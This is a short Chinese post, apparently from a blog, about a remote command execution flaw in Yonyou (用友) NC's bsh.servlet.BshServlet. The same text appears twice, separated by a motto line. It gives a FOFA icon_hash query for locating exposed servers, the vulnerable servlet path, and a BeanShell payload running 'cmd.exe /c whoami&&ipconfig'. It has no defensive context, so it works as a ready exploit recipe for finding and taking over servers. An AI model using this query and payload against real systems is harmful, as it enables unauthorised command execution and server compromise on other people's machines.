用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限
FOFA:
icon_hash="1085941792"
漏洞Url为
/servlet/~ic/bsh.servlet.BshServlet
执行
exec("cmd.exe /c whoami&&ipconfig")
逆水行舟,不进则退。
用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限
FOFA:
icon_hash="1085941792"
漏洞Url为
/servlet/~ic/bsh.servlet.BshServlet
执行
exec("cmd.exe /c whoami&&ipconfig")
浙公网安备 33010602011771号